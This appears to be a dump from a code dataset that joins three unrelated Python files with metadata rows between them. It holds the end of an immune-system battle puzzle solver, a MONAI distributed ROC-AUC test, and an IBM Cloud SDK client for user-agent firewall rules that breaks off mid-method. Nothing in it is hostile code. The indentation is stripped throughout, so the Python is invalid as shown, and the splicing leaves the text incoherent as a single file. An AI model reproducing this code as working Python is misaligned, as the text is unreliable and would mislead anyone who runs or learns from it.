Group("Inf1", 820, 46229, {'cold', 'bludgeoning'}, None, 106, 'slashing', 18),
Group("Inf2", 723, 30757, None, {'bludgeoning'}, 80, 'fire', 3),
Group("Inf3", 2907, 51667, {'bludgeoning'}, {'slashing'}, 32, 'fire', 1),
Group("Inf4", 2755, 49292, None, {'bludgeoning'}, 34, 'fire', 5),
Group("Inf5", 5824, 24708, {'cold', 'bludgeoning', 'radiation', 'slashing'}, None, 7, 'bludgeoning', 11),
Group("Inf6", 7501, 6943, {'slashing'}, {'cold'}, 1, 'radiation', 8),
Group("Inf7", 573, 10367, None, {'cold', 'slashing'}, 30, 'radiation', 16),
Group("Inf8", 84, 31020, None, {'cold'}, 639, 'slashing', 14),
Group("Inf9", 2063, 31223, {'bludgeoning'}, {'radiation'}, 25, 'cold', 13),
Group("Inf0", 214, 31088, None, {'fire'}, 271, 'slashing', 7)
]
#assert infection[0] == copy.deepcopy(infection[0])
def target_selection(attackers, defenders):
attackers = sorted(attackers, key=lambda t: (t.calculate_effective_power(), t.initiative), reverse=True)
for attacker in attackers:
defenders.sort(key=lambda t: (attacker.calculate_dmg(t), t.calculate_effective_power(), t.initiative), reverse=True)
# print(" | ".join(["{} {} {}".format(repr(t), t.is_target, attacker.calculate_dmg(t)) for t in defenders]))
for t in defenders:
if not t.is_target and attacker.calculate_dmg(t) > 0:
# print('-->', attacker, t, attacker.calculate_dmg(t))
t.is_target = True
attacker.target = t
break
return
def remove_defeated(a):
s = set([t for t in a if t.unit_count <= 0])
for t in s:
if t.target is not None:
t.target.is_target = False
a.remove(t)
return a
boost = 0
while True:
boost += 1
if boost == 11:
continue
print('\nBOOST:', boost, '\n')
before_imn = None
immune_groups = copy.deepcopy(immune_system)
for t in immune_groups:
t.atk_dmg += boost
# print(t, t.atk_dmg)
before_inf = None
infection_groups = copy.deepcopy(infection)
while len(immune_groups) > 0 and len(infection_groups) > 0:
target_selection(immune_groups, infection_groups)
target_selection(infection_groups, immune_groups)
if sum(t.is_target for t in immune_groups) == 0 and sum(t.is_target for t in infection_groups) == 0:
break
for attacker in sorted(immune_groups + infection_groups, key=lambda t: t.initiative, reverse=True):
if attacker.target is not None and\
attacker.target.unit_count > 0 and\
attacker.unit_count > 0:
target = attacker.target
dmg = attacker.calculate_dmg(target)
# print('\t', attacker.initiative, attacker, '|', dmg, '|', target, '|', dmg // target.unit_hit_point)
target.unit_count -= dmg // target.unit_hit_point
attacker.target = None
target.is_target = False
before_imn, before_inf, immune_groups, infection_groups = \
copy.deepcopy(immune_groups),\
copy.deepcopy(infection_groups),\
remove_defeated(immune_groups),\
remove_defeated(infection_groups)
if before_imn == immune_groups and before_inf == infection_groups:
break
#print(immune_groups)
#print(infection_groups)
if len(immune_groups) > 0 and len(infection_groups) == 0:
break
print(sum(t.unit_count for t in immune_groups))
| 44.373016 | 124 | 0.607584 |
e728c80be6df0f43af18a2197192f6b001f24c63 | 1,994 | py | Python | tests/test_handler_rocauc_dist.py | albarqounilab/MONAI | bb0b307d68021a243011a58fd82a1d275f00a51a | [
"Apache-2.0"
] | 1 | 2021-08-02T07:18:50.000Z | 2021-08-02T07:18:50.000Z | tests/test_handler_rocauc_dist.py | albarqounilab/MONAI | bb0b307d68021a243011a58fd82a1d275f00a51a | [
"Apache-2.0"
] | null | null | null | tests/test_handler_rocauc_dist.py | albarqounilab/MONAI | bb0b307d68021a243011a58fd82a1d275f00a51a | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
import torch
import torch.distributed as dist
from monai.handlers import ROCAUC
from monai.transforms import Activations, AsDiscrete
from tests.utils import DistCall, DistTestCase
class DistributedROCAUC(DistTestCase):
@DistCall(nnodes=1, nproc_per_node=2, node_rank=0)
def test_compute(self):
auc_metric = ROCAUC()
act = Activations(softmax=True)
to_onehot = AsDiscrete(to_onehot=True, n_classes=2)
device = f"cuda:{dist.get_rank()}" if torch.cuda.is_available() else "cpu"
if dist.get_rank() == 0:
y_pred = [torch.tensor([0.1, 0.9], device=device), torch.tensor([0.3, 1.4], device=device)]
y = [torch.tensor([0], device=device), torch.tensor([1], device=device)]
if dist.get_rank() == 1:
y_pred = [
torch.tensor([0.2, 0.1], device=device),
torch.tensor([0.1, 0.5], device=device),
torch.tensor([0.3, 0.4], device=device),
]
y = [torch.tensor([0], device=device), torch.tensor([1], device=device), torch.tensor([1], device=device)]
y_pred = [act(p) for p in y_pred]
y = [to_onehot(y_) for y_ in y]
auc_metric.update([y_pred, y])
result = auc_metric.compute()
np.testing.assert_allclose(0.66667, result, rtol=1e-4)
if __name__ == "__main__":
unittest.main()
| 36.925926 | 118 | 0.661986 |
7f679aacf799bef75b10def7cd3858d1edcd83d2 | 39,584 | py | Python | ibm_cloud_networking_services/user_agent_blocking_rules_v1.py | IBM/networking-services-python-sdk | a19e47db6a5971562a502982d69a5868997245f3 | [
"Apache-2.0"
] | 1 | 2020-12-22T03:51:33.000Z | 2020-12-22T03:51:33.000Z | ibm_cloud_networking_services/user_agent_blocking_rules_v1.py | IBM/networking-services-python-sdk | a19e47db6a5971562a502982d69a5868997245f3 | [
"Apache-2.0"
] | 57 | 2020-06-24T06:58:01.000Z | 2022-03-28T14:52:33.000Z | ibm_cloud_networking_services/user_agent_blocking_rules_v1.py | IBM/networking-services-python-sdk | a19e47db6a5971562a502982d69a5868997245f3 | [
"Apache-2.0"
] | 10 | 2020-06-23T04:09:28.000Z | 2022-03-26T18:20:35.000Z | # coding: utf-8
# (C) Copyright IBM Corp. 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
User-Agent Blocking Rules
"""
from enum import Enum
from typing import Dict, List
import json
from ibm_cloud_sdk_core import BaseService, DetailedResponse
from ibm_cloud_sdk_core.authenticators.authenticator import Authenticator
from ibm_cloud_sdk_core.get_authenticator import get_authenticator_from_environment
from ibm_cloud_sdk_core.utils import convert_model
from .common import get_sdk_headers
##############################################################################
# Service
##############################################################################
class UserAgentBlockingRulesV1(BaseService):
"""The User-Agent Blocking Rules V1 service."""
DEFAULT_SERVICE_URL = 'https://api.cis.cloud.ibm.com'
DEFAULT_SERVICE_NAME = 'user_agent_blocking_rules'
@classmethod
def new_instance(cls,
crn: str,
zone_identifier: str,
service_name: str = DEFAULT_SERVICE_NAME,
) -> 'UserAgentBlockingRulesV1':
"""
Return a new client for the User-Agent Blocking Rules service using the
specified parameters and external configuration.
:param str crn: Full url-encoded cloud resource name (CRN) of resource
instance.
:param str zone_identifier: Zone identifier of the zone for which
user-agent rule is created.
"""
if crn is None:
raise ValueError('crn must be provided')
if zone_identifier is None:
raise ValueError('zone_identifier must be provided')
authenticator = get_authenticator_from_environment(service_name)
service = cls(
crn,
zone_identifier,
authenticator
)
service.configure_service(service_name)
return service
def __init__(self,
crn: str,
zone_identifier: str,
authenticator: Authenticator = None,
) -> None:
"""
Construct a new client for the User-Agent Blocking Rules service.
:param str crn: Full url-encoded cloud resource name (CRN) of resource
instance.
:param str zone_identifier: Zone identifier of the zone for which
user-agent rule is created.
:param Authenticator authenticator: The authenticator specifies the authentication mechanism.
Get up to date information from https://github.com/IBM/python-sdk-core/blob/master/README.md
about initializing the authenticator of your choice.
"""
if crn is None:
raise ValueError('crn must be provided')
if zone_identifier is None:
raise ValueError('zone_identifier must be provided')
BaseService.__init__(self,
service_url=self.DEFAULT_SERVICE_URL,
authenticator=authenticator)
self.crn = crn
self.zone_identifier = zone_identifier
#########################
# User-Agent Blocking Rules
#########################
def list_all_zone_user_agent_rules(self,
*,
page: int = None,
per_page: int = None,
**kwargs
) -> DetailedResponse:
"""
List all user-agent blocking rules.
List all user agent blocking rules.
:param int page: (optional) Page number of paginated results.
:param int per_page: (optional) Maximum number of user-agent rules per
page.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `ListUseragentRulesResp` object
"""
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='list_all_zone_user_agent_rules')
headers.update(sdk_headers)
params = {
'page': page,
'per_page': per_page
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules'.format(
*self.encode_path_vars(self.crn, self.zone_identifier))
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request)
return response
def create_zone_user_agent_rule(self,
*,
mode: str = None,
configuration: 'UseragentRuleInputConfiguration' = None,
paused: bool = None,
description: str = None,
**kwargs
) -> DetailedResponse:
"""
Create user-agent blocking rule.
Create a new user-agent blocking rule for a given zone under a service instance.
:param str mode: (optional) The type of action to perform.
:param UseragentRuleInputConfiguration configuration: (optional)
Target/Value pair to use for this rule. The value is the exact UserAgent to
match.
:param bool paused: (optional) Whether this user-agent rule is currently
disabled.
:param str description: (optional) Some useful information about this rule
to help identify the purpose of it.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `UseragentRuleResp` object
"""
if configuration is not None:
configuration = convert_model(configuration)
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='create_zone_user_agent_rule')
headers.update(sdk_headers)
data = {
'mode': mode,
'configuration': configuration,
'paused': paused,
'description': description
}
data = {k: v for (k, v) in data.items() if v is not None}
data = json.dumps(data)
headers['content-type'] = 'application/json'
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules'.format(
*self.encode_path_vars(self.crn, self.zone_identifier))
request = self.prepare_request(method='POST',
url=url,
headers=headers,
data=data)
response = self.send(request)
return response
def delete_zone_user_agent_rule(self,
useragent_rule_identifier: str,
**kwargs
) -> DetailedResponse:
"""
Delete user-agent blocking rule.
Delete a user-agent blocking rule for a particular zone, given its id.
:param str useragent_rule_identifier: Identifier of the user-agent rule to
be deleted.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `DeleteUseragentRuleResp` object
"""
if useragent_rule_identifier is None:
raise ValueError('useragent_rule_identifier must be provided')
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='delete_zone_user_agent_rule')
headers.update(sdk_headers)
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules/{2}'.format(
*self.encode_path_vars(self.crn, self.zone_identifier, useragent_rule_identifier))
request = self.prepare_request(method='DELETE',
url=url,
headers=headers)
response = self.send(request)
return response
def get_user_agent_rule(self,
useragent_rule_identifier: str,
**kwargs
) -> DetailedResponse:
"""
Get user-agent blocking rule.
For a given service instance, zone id and user-agent rule id, get the user-agent
blocking rule details.
:param str useragent_rule_identifier: Identifier of user-agent blocking
rule for the given zone.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `UseragentRuleResp` object
"""
if useragent_rule_identifier is None:
raise ValueError('useragent_rule_identifier must be provided')
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='get_user_agent_rule')
headers.update(sdk_headers)
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules/{2}'.format(
*self.encode_path_vars(self.crn, self.zone_identifier, useragent_rule_identifier))
request = self.prepare_request(method='GET',
url=url,
headers=headers)
response = self.send(request)
return response
def update_user_agent_rule(self,
useragent_rule_identifier: str,
*,
mode: str = None,
configuration: 'UseragentRuleInputConfiguration' = None,
paused: bool = None,
description: str = None,
**kwargs
) -> DetailedResponse:
"""
Update user-agent blocking rule.
Update an existing user-agent blocking rule for a given zone under a given service
instance.
:param str useragent_rule_identifier: Identifier of user-agent rule.
:param str mode: (optional) The type of action to perform.
:param UseragentRuleInputConfiguration configuration: (optional)
Target/Value pair to use for this rule. The value is the exact UserAgent to
match.
:param bool paused: (optional) Whether this user-agent rule is currently
disabled.
:param str description: (optional) Some useful information about this rule
to help identify the purpose of it.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `UseragentRuleResp` object
"""
if useragent_rule_identifier is None:
raise ValueError('useragent_rule_identifier must be provided')
if configuration is not None:
configuration = convert_model(configuration)
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='update_user_agent_rule')
headers.update(sdk_headers)
data = {
'mode': mode,
'configuration': configuration,
'paused': paused,
'description': description
}
data = {k: v for (k, v) in data.items() if v is not None}
data = json.dumps(data)
headers['content-type'] = 'application/json'
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules/{2}'.format(
*self.encode_path_vars(self.crn, self.zone_identifier, useragent_rule_identifier))
request = self.prepare_request(method='PUT',
url=url,
headers=headers,
data=data)
response = self.send(request)
return response
##############################################################################
# Models
##############################################################################
class DeleteUseragentRuleRespResult():
"""
Container for response information.
:attr str id: ID.
"""
def __init__(self,
id: str) -> None:
"""
Initialize a DeleteUseragentRuleRespResult object.
:param str id: ID.
"""
self.id = id
@classmethod
def from_dict(cls, _dict: Dict) -> 'DeleteUseragentRuleRespResult':
"""Initialize a DeleteUseragentRuleRespResult object from a json dictionary."""
args = {}
if 'id' in _dict:
args['id'] = _dict.get('id')
else:
raise ValueError('Required property \'id\' not present in DeleteUseragentRuleRespResult JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a DeleteUseragentRuleRespResult object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'id') and self.id is not None:
_dict['id'] = self.id
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this DeleteUseragentRuleRespResult object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'DeleteUseragentRuleRespResult') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'DeleteUseragentRuleRespResult') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ListUseragentRulesRespResultInfo():
"""
Statistics of results.
:attr int page: Page number.
:attr int per_page: Number of results per page.
:attr int count: Number of results.
:attr int total_count: Total number of results.
"""
def __init__(self,
page: int,
per_page: int,
count: int,
total_count: int) -> None:
"""
Initialize a ListUseragentRulesRespResultInfo object.
:param int page: Page number.
:param int per_page: Number of results per page.
:param int count: Number of results.
:param int total_count: Total number of results.
"""
self.page = page
self.per_page = per_page
self.count = count
self.total_count = total_count
@classmethod
def from_dict(cls, _dict: Dict) -> 'ListUseragentRulesRespResultInfo':
"""Initialize a ListUseragentRulesRespResultInfo object from a json dictionary."""
args = {}
if 'page' in _dict:
args['page'] = _dict.get('page')
else:
raise ValueError('Required property \'page\' not present in ListUseragentRulesRespResultInfo JSON')
if 'per_page' in _dict:
args['per_page'] = _dict.get('per_page')
else:
raise ValueError('Required property \'per_page\' not present in ListUseragentRulesRespResultInfo JSON')
if 'count' in _dict:
args['count'] = _dict.get('count')
else:
raise ValueError('Required property \'count\' not present in ListUseragentRulesRespResultInfo JSON')
if 'total_count' in _dict:
args['total_count'] = _dict.get('total_count')
else:
raise ValueError('Required property \'total_count\' not present in ListUseragentRulesRespResultInfo JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ListUseragentRulesRespResultInfo object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'page') and self.page is not None:
_dict['page'] = self.page
if hasattr(self, 'per_page') and self.per_page is not None:
_dict['per_page'] = self.per_page
if hasattr(self, 'count') and self.count is not None:
_dict['count'] = self.count
if hasattr(self, 'total_count') and self.total_count is not None:
_dict['total_count'] = self.total_count
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ListUseragentRulesRespResultInfo object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'ListUseragentRulesRespResultInfo') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ListUseragentRulesRespResultInfo') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class UseragentRuleInputConfiguration():
"""
Target/Value pair to use for this rule. The value is the exact UserAgent to match.
:attr str target: properties.
:attr str value: The exact UserAgent string to match with this rule.
"""
def __init__(self,
target: str,
value: str) -> None:
"""
Initialize a UseragentRuleInputConfiguration object.
:param str target: properties.
:param str value: The exact UserAgent string to match with this rule.
"""
self.target = target
self.value = value
@classmethod
def from_dict(cls, _dict: Dict) -> 'UseragentRuleInputConfiguration':
"""Initialize a UseragentRuleInputConfiguration object from a json dictionary."""
args = {}
if 'target' in _dict:
args['target'] = _dict.get('target')
else:
raise ValueError('Required property \'target\' not present in UseragentRuleInputConfiguration JSON')
if 'value' in _dict:
args['value'] = _dict.get('value')
else:
raise ValueError('Required property \'value\' not present in UseragentRuleInputConfiguration JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a UseragentRuleInputConfiguration object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'target') and self.target is not None:
_dict['target'] = self.target
if hasattr(self, 'value') and self.value is not None:
_dict['value'] = self.value
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this UseragentRuleInputConfiguration object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'UseragentRuleInputConfiguration') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'UseragentRuleInputConfiguration') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class TargetEnum(str, Enum):
"""
properties.
"""
UA = 'ua'
class UseragentRuleObjectConfiguration():
"""
Target/Value pair to use for this rule. The value is the exact UserAgent to match.
:attr str target: properties.
:attr str value: The exact UserAgent string to match with this rule.
"""
def __init__(self,
target: str,
value: str) -> None:
"""
Initialize a UseragentRuleObjectConfiguration object.
:param str target: properties.
:param str value: The exact UserAgent string to match with this rule.
"""
self.target = target
self.value = value
@classmethod
def from_dict(cls, _dict: Dict) -> 'UseragentRuleObjectConfiguration':
"""Initialize a UseragentRuleObjectConfiguration object from a json dictionary."""
args = {}
if 'target' in _dict:
args['target'] = _dict.get('target')
else:
raise ValueError('Required property \'target\' not present in UseragentRuleObjectConfiguration JSON')
if 'value' in _dict:
args['value'] = _dict.get('value')
else:
raise ValueError('Required property \'value\' not present in UseragentRuleObjectConfiguration JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a UseragentRuleObjectConfiguration object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'target') and self.target is not None:
_dict['target'] = self.target
if hasattr(self, 'value') and self.value is not None:
_dict['value'] = self.value
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this UseragentRuleObjectConfiguration object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'UseragentRuleObjectConfiguration') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'UseragentRuleObjectConfiguration') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class TargetEnum(str, Enum):
"""
properties.
"""
UA = 'ua'
class DeleteUseragentRuleResp():
"""
user agent delete response.
:attr bool success: Operation success flag.
:attr List[List[str]] errors: Array of errors encountered.
:attr List[List[str]] messages: Array of messages returned.
:attr DeleteUseragentRuleRespResult result: Container for response information.
"""
def __init__(self,
success: bool,
errors: List[List[str]],
messages: List[List[str]],
result: 'DeleteUseragentRuleRespResult') -> None:
"""
Initialize a DeleteUseragentRuleResp object.
:param bool success: Operation success flag.
:param List[List[str]] errors: Array of errors encountered.
:param List[List[str]] messages: Array of messages returned.
:param DeleteUseragentRuleRespResult result: Container for response
information.
"""
self.success = success
self.errors = errors
self.messages = messages
self.result = result
@classmethod
def from_dict(cls, _dict: Dict) -> 'DeleteUseragentRuleResp':
"""Initialize a DeleteUseragentRuleResp object from a json dictionary."""
args = {}
if 'success' in _dict:
args['success'] = _dict.get('success')
else:
raise ValueError('Required property \'success\' not present in DeleteUseragentRuleResp JSON')
if 'errors' in _dict:
args['errors'] = _dict.get('errors')
else:
raise ValueError('Required property \'errors\' not present in DeleteUseragentRuleResp JSON')
if 'messages' in _dict:
args['messages'] = _dict.get('messages')
else:
raise ValueError('Required property \'messages\' not present in DeleteUseragentRuleResp JSON')
if 'result' in _dict:
args['result'] = DeleteUseragentRuleRespResult.from_dict(_dict.get('result'))
else:
raise ValueError('Required property \'result\' not present in DeleteUseragentRuleResp JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a DeleteUseragentRuleResp object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'success') and self.success is not None:
_dict['success'] = self.success
if hasattr(self, 'errors') and self.errors is not None:
_dict['errors'] = self.errors
if hasattr(self, 'messages') and self.messages is not None:
_dict['messages'] = self.messages
if hasattr(self, 'result') and self.result is not None:
_dict['result'] = self.result.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this DeleteUseragentRuleResp object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'DeleteUseragentRuleResp') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'DeleteUseragentRuleResp') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ListUseragentRulesResp():
"""
user agent rules response.
:attr bool success: Was operation successful.
:attr List[List[str]] errors: Array of errors encountered.
:attr List[List[str]] messages: Array of messages returned.
:attr List[UseragentRuleObject] result: Container for response information.
:attr ListUseragentRulesRespResultInfo result_info: Statistics of results.
"""
def __init__(self,
success: bool,
errors: List[List[str]],
messages: List[List[str]],
result: List['UseragentRuleObject'],
result_info: 'ListUseragentRulesRespResultInfo') -> None:
"""
Initialize a ListUseragentRulesResp object.
:param bool success: Was operation successful.
:param List[List[str]] errors: Array of errors encountered.
:param List[List[str]] messages: Array of messages returned.
:param List[UseragentRuleObject] result: Container for response
information.
:param ListUseragentRulesRespResultInfo result_info: Statistics of results.
"""
self.success = success
self.errors = errors
self.messages = messages
self.result = result
self.result_info = result_info
@classmethod
def from_dict(cls, _dict: Dict) -> 'ListUseragentRulesResp':
"""Initialize a ListUseragentRulesResp object from a json dictionary."""
args = {}
if 'success' in _dict:
args['success'] = _dict.get('success')
else:
raise ValueError('Required property \'success\' not present in ListUseragentRulesResp JSON')
if 'errors' in _dict:
args['errors'] = _dict.get('errors')
else:
raise ValueError('Required property \'errors\' not present in ListUseragentRulesResp JSON')
if 'messages' in _dict:
args['messages'] = _dict.get('messages')
else:
raise ValueError('Required property \'messages\' not present in ListUseragentRulesResp JSON')
if 'result' in _dict:
args['result'] = [UseragentRuleObject.from_dict(x) for x in _dict.get('result')]
else:
raise ValueError('Required property \'result\' not present in ListUseragentRulesResp JSON')
if 'result_info' in _dict:
args['result_info'] = ListUseragentRulesRespResultInfo.from_dict(_dict.get('result_info'))
else:
raise ValueError('Required property \'result_info\' not present in ListUseragentRulesResp JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ListUseragentRulesResp object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'success') and self.success is not None:
_dict['success'] = self.success
if hasattr(self, 'errors') and self.errors is not None:
_dict['errors'] = self.errors
if hasattr(self, 'messages') and self.messages is not None:
_dict['messages'] = self.messages
if hasattr(self, 'result') and self.result is not None:
_dict['result'] = [x.to_dict() for x in self.result]
if hasattr(self, 'result_info') and self.result_info is not None:
_dict['result_info'] = self.result_info.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ListUseragentRulesResp object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'ListUseragentRulesResp') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ListUseragentRulesResp') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class UseragentRuleObject():
"""
user agent rule object.
:attr str id: Identifier of the user-agent blocking rule.
:attr bool paused: Whether this user-agent rule is currently disabled.
:attr str description: Some useful information about this rule to help identify
the purpose of it.
:attr str mode: The type of action to perform.
:attr UseragentRuleObjectConfiguration configuration: Target/Value pair to use
for this rule. The value is the exact UserAgent to match.
"""
def __init__(self,
id: str,
paused: bool,
description: str,
mode: str,
configuration: 'UseragentRuleObjectConfiguration') -> None:
"""
Initialize a UseragentRuleObject object.
:param str id: Identifier of the user-agent blocking rule.
:param bool paused: Whether this user-agent rule is currently disabled.
:param str description: Some useful information about this rule to help
identify the purpose of it.
:param str mode: The type of action to perform.
:param UseragentRuleObjectConfiguration configuration: Target/Value pair to
use for this rule. The value is the exact UserAgent to match.
"""
self.id = id
self.paused = paused
self.description = description
self.mode = mode
self.configuration = configuration
@classmethod
def from_dict(cls, _dict: Dict) -> 'UseragentRuleObject':
"""Initialize a UseragentRuleObject object from a json dictionary."""
args = {}
if 'id' in _dict:
args['id'] = _dict.get('id')
else:
raise ValueError('Required property \'id\' not present in UseragentRuleObject JSON')
if 'paused' in _dict:
args['paused'] = _dict.get('paused')
else:
raise ValueError('Required property \'paused\' not present in UseragentRuleObject JSON')
if 'description' in _dict:
args['description'] = _dict.get('description')
else:
raise ValueError('Required property \'description\' not present in UseragentRuleObject JSON')
if 'mode' in _dict:
args['mode'] = _dict.get('mode')
else:
raise ValueError('Required property \'mode\' not present in UseragentRuleObject JSON')
if 'configuration' in _dict:
args['configuration'] = UseragentRuleObjectConfiguration.from_dict(_dict.get('configuration'))
else:
raise ValueError('Required property \'configuration\' not present in UseragentRuleObject JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a UseragentRuleObject object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'id') and self.id is not None:
_dict['id'] = self.id
if hasattr(self, 'paused') and self.paused is not None:
_dict['paused'] = self.paused
if hasattr(self, 'description') and self.description is not None:
_dict['description'] = self.description
if hasattr(self, 'mode') and self.mode is not None:
_dict['mode'] = self.mode
if hasattr(self, 'configuration') and self.configuration is not None:
_dict['configuration'] = self.configuration.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this UseragentRuleObject object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'UseragentRuleObject') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'UseragentRuleObject') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ModeEnum(str, Enum):
"""
The type of action to perform.
"""
BLOCK = 'block'
CHALLENGE = 'challenge'
JS_CHALLENGE = 'js_challenge'
class UseragentRuleResp():
"""
user agent rule response.
:attr bool success: Was operation successful.
:attr List[List[str]] errors: Array of errors encountered.
:attr List[List[str]] messages: Array of messages returned.
:attr UseragentRuleObject result: user agent rule object.
"""
def __init__(self,
success: bool,
errors: List[List[str]],
messages: List[List[str]],
result: 'UseragentRuleObject') -> None:
"""
Initialize a UseragentRuleResp object.
:param bool success: Was operation successful.
:param List[List[str]] errors: Array of errors encountered.
:param List[List[str]] messages: Array of messages returned.
:param UseragentRuleObject result: user agent rule object.
"""
self.success = success
self.errors = errors
self.messages = messages
self.result = result
@classmethod
def from_dict(cls, _dict: Dict) -> 'UseragentRuleResp':
"""Initialize a UseragentRuleResp object from a json dictionary."""
args = {}
if 'success' in _dict:
